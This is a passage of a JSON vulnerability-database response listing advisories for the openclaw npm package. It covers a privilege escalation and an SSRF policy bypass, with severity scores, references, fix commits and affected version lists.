`v2026.3.22`\n\n## Fix Commit(s)\n- `a600c72ed7d0045a27f58bf031d2b36ecb0141c9` — 2026-03-22T23:57:15-07:00\n\nOpenClaw thanks @tdjackey for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41386", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.1385", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13886", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13882", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41386" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a600c72ed7d0045a27f58bf031d2b36ecb0141c9", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "9.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a600c72ed7d0045a27f58bf031d2b36ecb0141c9" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gg9v-mgcp-v6m7", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "9.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gg9v-mgcp-v6m7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41386", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41386" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-unbound-bootstrap-setup-codes", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "9.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-unbound-bootstrap-setup-codes" }, { "reference_url": "https://github.com/advisories/GHSA-gg9v-mgcp-v6m7", "reference_id": "GHSA-gg9v-mgcp-v6m7", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gg9v-mgcp-v6m7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-41386", "GHSA-gg9v-mgcp-v6m7" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zpb1-e3g9-vkbh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89719?format=api", "vulnerability_id": "VCID-zpte-tgt5-wqcm", "summary": "OpenClaw: Browser tabs action select and close routes bypassed SSRF policy\n## Summary\n\nBrowser tabs action select and close routes bypassed SSRF policy.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe browser `/tabs/action` select and close branches could operate on targets without enforcing configured browser SSRF policy, weakening tab-level navigation protections.\n\n## Technical Details\n\nThe fix enforces browser SSRF policy in the select and close tab-action branches.\n\n## Fix\n\nThe issue was fixed in #63332. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `48c0347921b7e9438af0312968fc360ca88023f3`\n- PR: #63332\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42439", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09559", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11153", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11187", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42439" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/48c03479211799ec3c1305ad69037cea25ba0e1e", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/48c03479211799ec3c1305ad69037cea25ba0e1e" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/48c0347921b7e9438af0312968fc360ca88023f3", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/48c0347921b7e9438af0312968fc360ca88023f3" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/63332", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/63332" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rj2p-j66c-mgqh", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rj2p-j66c-mgqh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42439", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42439" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-browser-tabs-action-routes", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-browser-tabs-action-routes" }, { "reference_url": "https://github.com/advisories/GHSA-rj2p-j66c-mgqh", "reference_id": "GHSA-rj2p-j66c-mgqh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rj2p-j66c-mgqh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-42439", "GHSA-rj2p-j66c-mgqh" ], "risk_score": 3.9, "exploitability": "0.5", "weighted_severity": "7.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zpte-tgt5-wqcm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89586?format=api", "vulnerability_id": "VCID-zu4s-jnn3-1kd8", "summary": "OpenClaw: Exec environment denylist missed high-risk interpreter startup variables\n## Summary\n\nExec environment denylist missed high-risk interpreter startup variables.\n\n## Affected Packages / 